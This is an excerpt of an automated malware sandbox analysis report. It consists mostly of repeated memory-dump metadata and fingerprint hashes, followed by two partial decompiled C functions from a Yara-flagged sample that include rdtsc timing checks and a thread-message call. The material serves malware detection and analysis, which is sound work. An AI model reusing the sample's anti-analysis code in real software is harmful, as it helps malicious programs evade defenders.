                                                                                                                                                            • Associated: 00000006.00000002.2218194748.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218362808.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218367843.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218373725.0000000000A34000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218380017.0000000000A37000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218387315.0000000000A40000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218455487.0000000000AA0000.00000040.00000001.sdmp Download File
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                            • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                                                                                                            • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                                                                                                                            • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                                                                                                            • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2218202835.0000000000940000.00000040.00000001.sdmp, Offset: 00930000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.2218194748.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218362808.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218367843.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218373725.0000000000A34000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218380017.0000000000A37000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218387315.0000000000A40000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218455487.0000000000AA0000.00000040.00000001.sdmp Download File
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                            • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                                                                                                            • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                                                                                                                            • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                                                                                                            • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2218202835.0000000000940000.00000040.00000001.sdmp, Offset: 00930000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.2218194748.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218362808.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218367843.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218373725.0000000000A34000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218380017.0000000000A37000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218387315.0000000000A40000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218455487.0000000000AA0000.00000040.00000001.sdmp Download File
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                            • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                                                                                            • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                                                                                                                            • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                                                                                            • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2218202835.0000000000940000.00000040.00000001.sdmp, Offset: 00930000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.2218194748.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218362808.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218367843.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218373725.0000000000A34000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218380017.0000000000A37000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218387315.0000000000A40000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218455487.0000000000AA0000.00000040.00000001.sdmp Download File
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                            • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                                                                                                            • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                                                                                                                            • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                                                                                                            • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2218202835.0000000000940000.00000040.00000001.sdmp, Offset: 00930000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.2218194748.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218362808.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218367843.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218373725.0000000000A34000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218380017.0000000000A37000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218387315.0000000000A40000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218455487.0000000000AA0000.00000040.00000001.sdmp Download File
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                            • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                                                                                            • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                                                                                                                            • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                                                                                            • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2218202835.0000000000940000.00000040.00000001.sdmp, Offset: 00930000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.2218194748.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218362808.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218367843.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218373725.0000000000A34000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218380017.0000000000A37000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218387315.0000000000A40000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218455487.0000000000AA0000.00000040.00000001.sdmp Download File
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                            • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                                                                                                                            • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                                                                                                                                                            • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                                                                                                                            • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2218202835.0000000000940000.00000040.00000001.sdmp, Offset: 00930000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.2218194748.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218362808.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218367843.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218373725.0000000000A34000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218380017.0000000000A37000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218387315.0000000000A40000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218455487.0000000000AA0000.00000040.00000001.sdmp Download File
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                            • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                                                                                            • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                                                                                                                            • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                                                                                            • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2218202835.0000000000940000.00000040.00000001.sdmp, Offset: 00930000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.2218194748.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218362808.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218367843.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218373725.0000000000A34000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218380017.0000000000A37000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218387315.0000000000A40000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218455487.0000000000AA0000.00000040.00000001.sdmp Download File
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                            • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                                                                                                            • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                                                                                                                            • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                                                                                                            • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2218202835.0000000000940000.00000040.00000001.sdmp, Offset: 00930000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.2218194748.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218362808.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218367843.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218373725.0000000000A34000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218380017.0000000000A37000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218387315.0000000000A40000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218455487.0000000000AA0000.00000040.00000001.sdmp Download File
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                            • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                                                                                            • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                                                                                                                            • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                                                                                            • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2218202835.0000000000940000.00000040.00000001.sdmp, Offset: 00930000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.2218194748.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218362808.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218367843.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218373725.0000000000A34000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218380017.0000000000A37000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218387315.0000000000A40000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218455487.0000000000AA0000.00000040.00000001.sdmp Download File
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                            • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                                                                                                                            • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                                                                                                                                                            • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                                                                                                                            • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2218202835.0000000000940000.00000040.00000001.sdmp, Offset: 00930000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.2218194748.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218362808.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218367843.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218373725.0000000000A34000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218380017.0000000000A37000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218387315.0000000000A40000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218455487.0000000000AA0000.00000040.00000001.sdmp Download File
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                            • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                                                                                            • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                                                                                                                            • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                                                                                            • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2218202835.0000000000940000.00000040.00000001.sdmp, Offset: 00930000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.2218194748.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218362808.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218367843.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218373725.0000000000A34000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218380017.0000000000A37000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218387315.0000000000A40000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218455487.0000000000AA0000.00000040.00000001.sdmp Download File
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                            • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                                                                                            • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                                                                                                                            • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                                                                                            • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 71%
                                                                                                                                                            			E00409A90(intOrPtr* _a4) {
                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                            				char _v24;
                                                                                                                                                            				char _v284;
                                                                                                                                                            				char _v804;
                                                                                                                                                            				char _v840;
                                                                                                                                                            				void* _t24;
                                                                                                                                                            				void* _t31;
                                                                                                                                                            				void* _t33;
                                                                                                                                                            				void* _t34;
                                                                                                                                                            				void* _t39;
                                                                                                                                                            				void* _t48;
                                                                                                                                                            				intOrPtr* _t50;
                                                                                                                                                            				void* _t51;
                                                                                                                                                            				void* _t52;
                                                                                                                                                            				void* _t53;
                                                                                                                                                            				void* _t54;
                                                                                                                                                            
                                                                                                                                                            				_t50 = _a4;
                                                                                                                                                            				_t39 = 0; // executed
                                                                                                                                                            				_t24 = E00407E80(_t50,  &_v24); // executed
                                                                                                                                                            				_t52 = _t51 + 8;
                                                                                                                                                            				if(_t24 != 0) {
                                                                                                                                                            					_t40 =  &_v840;
                                                                                                                                                            					E00408090( &_v24,  &_v840);
                                                                                                                                                            					_t53 = _t52 + 8;
                                                                                                                                                            					do {
                                                                                                                                                            						_push(0x104);
                                                                                                                                                            						_push( &_v284);
                                                                                                                                                            						E0041B810(_t40);
                                                                                                                                                            						_t40 =  &_v804;
                                                                                                                                                            						E0041BE80( &_v284,  &_v804);
                                                                                                                                                            						_t54 = _t53 + 0x10;
                                                                                                                                                            						_t48 = 0x4f;
                                                                                                                                                            						while(1) {
                                                                                                                                                            							_t31 = E00414DC0(_t40, E00414D60(_t50, _t48),  &_v284);
                                                                                                                                                            							_t54 = _t54 + 0x10;
                                                                                                                                                            							asm("les ecx, [eax]");
                                                                                                                                                            							if(_t31 != 0) {
                                                                                                                                                            								break;
                                                                                                                                                            							}
                                                                                                                                                            							_t48 = _t48 + 1;
                                                                                                                                                            							if(_t48 <= 0x62) {
                                                                                                                                                            								continue;
                                                                                                                                                            							} else {
                                                                                                                                                            							}
                                                                                                                                                            							goto L9;
                                                                                                                                                            						}
                                                                                                                                                            						_t9 = _t50 + 0x14; // 0xffffe045
                                                                                                                                                            						_t40 =  *_t9;
                                                                                                                                                            						 *(_t50 + 0x474) =  *(_t50 + 0x474) ^  *_t9;
                                                                                                                                                            						_t39 = 1;
                                                                                                                                                            						L9:
                                                                                                                                                            						_t33 = E004080C0( &_v24,  &_v840);
                                                                                                                                                            						_t53 = _t54 + 8;
                                                                                                                                                            					} while (_t33 != 0 && _t39 == 0);
                                                                                                                                                            					_t34 = E00408140(_t50,  &_v24); // executed
                                                                                                                                                            					if(_t39 == 0) {
                                                                                                                                                            						asm("rdtsc");
                                                                                                                                                            						asm("rdtsc");
                                                                                                                                                            						_v8 = _t34 - 0 + _t34;
                                                                                                                                                            						 *((intOrPtr*)(_t50 + 0x55c)) =  *((intOrPtr*)(_t50 + 0x55c)) + 0xffffffba;
                                                                                                                                                            					}
                                                                                                                                                            					 *((intOrPtr*)(_t50 + 0x31)) =  *((intOrPtr*)(_t50 + 0x31)) + _t39;
                                                                                                                                                            					_t20 = _t50 + 0x31; // 0x5608758b
                                                                                                                                                            					 *((intOrPtr*)(_t50 + 0x32)) =  *((intOrPtr*)(_t50 + 0x32)) +  *_t20 + 1;
                                                                                                                                                            					return 1;
                                                                                                                                                            				} else {
                                                                                                                                                            					return _t24;
                                                                                                                                                            				}
                                                                                                                                                            			}



















                                                                                                                                                            0x00409a9b
                                                                                                                                                            0x00409aa3
                                                                                                                                                            0x00409aa5
                                                                                                                                                            0x00409aaa
                                                                                                                                                            0x00409aaf
                                                                                                                                                            0x00409ab7
                                                                                                                                                            0x00409ac2
                                                                                                                                                            0x00409ac7
                                                                                                                                                            0x00409ad0
                                                                                                                                                            0x00409ad6
                                                                                                                                                            0x00409adb
                                                                                                                                                            0x00409adc
                                                                                                                                                            0x00409ae1
                                                                                                                                                            0x00409aef
                                                                                                                                                            0x00409af4
                                                                                                                                                            0x00409af7
                                                                                                                                                            0x00409b00
                                                                                                                                                            0x00409b12
                                                                                                                                                            0x00409b17
                                                                                                                                                            0x00409b18
                                                                                                                                                            0x00409b1c
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00409b1e
                                                                                                                                                            0x00409b22
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00409b24
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00409b22
                                                                                                                                                            0x00409b26
                                                                                                                                                            0x00409b26
                                                                                                                                                            0x00409b29
                                                                                                                                                            0x00409b2f
                                                                                                                                                            0x00409b31
                                                                                                                                                            0x00409b3c
                                                                                                                                                            0x00409b41
                                                                                                                                                            0x00409b44
                                                                                                                                                            0x00409b51
                                                                                                                                                            0x00409b5c
                                                                                                                                                            0x00409b5e
                                                                                                                                                            0x00409b64
                                                                                                                                                            0x00409b68
                                                                                                                                                            0x00409b6b
                                                                                                                                                            0x00409b6b
                                                                                                                                                            0x00409b72
                                                                                                                                                            0x00409b75
                                                                                                                                                            0x00409b7a
                                                                                                                                                            0x00409b87
                                                                                                                                                            0x00409ab6
                                                                                                                                                            0x00409ab6
                                                                                                                                                            0x00409ab6

                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2216903843.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 1da3a0a51de53f8e4f95f41efafe70bd92c6e1b826fb8f0c5d51986441d80343
                                                                                                                                                            • Instruction ID: 3804b4b6881f0f279124858c5e35b72bf87e4fbc11d5a75f000cd7e24852ad46
                                                                                                                                                            • Opcode Fuzzy Hash: 1da3a0a51de53f8e4f95f41efafe70bd92c6e1b826fb8f0c5d51986441d80343
                                                                                                                                                            • Instruction Fuzzy Hash: 64213CB2D4020857CB25D664AD42AEF737CEB54308F04017FE949A3182F7387E49CBA5
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 61%
                                                                                                                                                            			E004082E8(void* __eax, void* __esi, intOrPtr _a4, long _a8) {
                                                                                                                                                            				char _v67;
                                                                                                                                                            				char _v68;
                                                                                                                                                            				void* __edi;
                                                                                                                                                            				void* _t15;
                                                                                                                                                            				int _t16;
                                                                                                                                                            				void* _t19;
                                                                                                                                                            				void* _t23;
                                                                                                                                                            				long _t24;
                                                                                                                                                            				int _t30;
                                                                                                                                                            				void* _t33;
                                                                                                                                                            				void* _t35;
                                                                                                                                                            				void* _t40;
                                                                                                                                                            
                                                                                                                                                            				asm("xlatb");
                                                                                                                                                            				asm("wait");
                                                                                                                                                            				_t40 = __esi - 0x550ce1f6;
                                                                                                                                                            				_t33 = _t35;
                                                                                                                                                            				_v68 = 0;
                                                                                                                                                            				E0041B860( &_v67, 0, 0x3f);
                                                                                                                                                            				E0041C400( &_v68, 3);
                                                                                                                                                            				_t15 = E0040ACD0(_t19, _t23, _t40, _a4 + 0x1c,  &_v68); // executed
                                                                                                                                                            				_t16 = E00414E20(_a4 + 0x1c, _t15, 0, 0, 0xc4e7b6d6);
                                                                                                                                                            				_t30 = _t16;
                                                                                                                                                            				if(_t30 != 0) {
                                                                                                                                                            					_push(_t23);
                                                                                                                                                            					_t24 = _a8;
                                                                                                                                                            					_t16 = PostThreadMessageW(_t24, 0x111, 0, 0); // executed
                                                                                                                                                            					_t42 = _t16;
                                                                                                                                                            					if(_t16 == 0) {
                                                                                                                                                            						_t16 =  *_t30(_t24, 0x8003, _t33 + (E0040A460(_t42, 1, 8) & 0x000000ff) - 0x40, _t16);
                                                                                                                                                            					}
                                                                                                                                                            				}
                                                                                                                                                            				return _t16;
                                                                                                                                                            			}















                                                                                                                                                            0x004082e8
                                                                                                                                                            0x004082eb
                                                                                                                                                            0x004082ec
                                                                                                                                                            0x004082f1
                                                                                                                                                            0x004082ff
                                                                                                                                                            0x00408303
                                                                                                                                                            0x0040830e
                                                                                                                                                            0x0040831e
                                                                                                                                                            0x0040832e
                                                                                                                                                            0x00408333
                                                                                                                                                            0x0040833a
                                                                                                                                                            0x0040833c
                                                                                                                                                            0x0040833d
                                                                                                                                                            0x0040834a
                                                                                                                                                            0x0040834c
                                                                                                                                                            0x0040834e
                                                                                                                                                            0x0040836b
                                                                                                                                                            0x0040836b
                                                                                                                                                            0x0040836d
                                                                                                                                                            0x00408372

                                                                                                                                                            APIs
                                                                                                                                                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2216903843.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: MessagePostThread
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1836367815-0
                                                                                                                                                            • Opcode ID: bc66a93de982fcc152c2eecad4ca8144d9429f41e232e602208d9272adf07d3c
                                                                                                                                                            • Instruction ID: fcceadab495225344db43e8cd43de3fac09e5b8ef18c0673687ce972fc43dffa
                                                                                                                                                            • Opcode Fuzzy Hash: bc66a93de982fcc152c2eecad4ca8144d9429f41e232e602208d9272adf07d3c
                                                                                                                                                            • Instruction Fuzzy Hash: A301D831A803287BE721A6959C43FFE762CAB40F54F04411AFF04BA1C1E6A8691647EA
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 74%
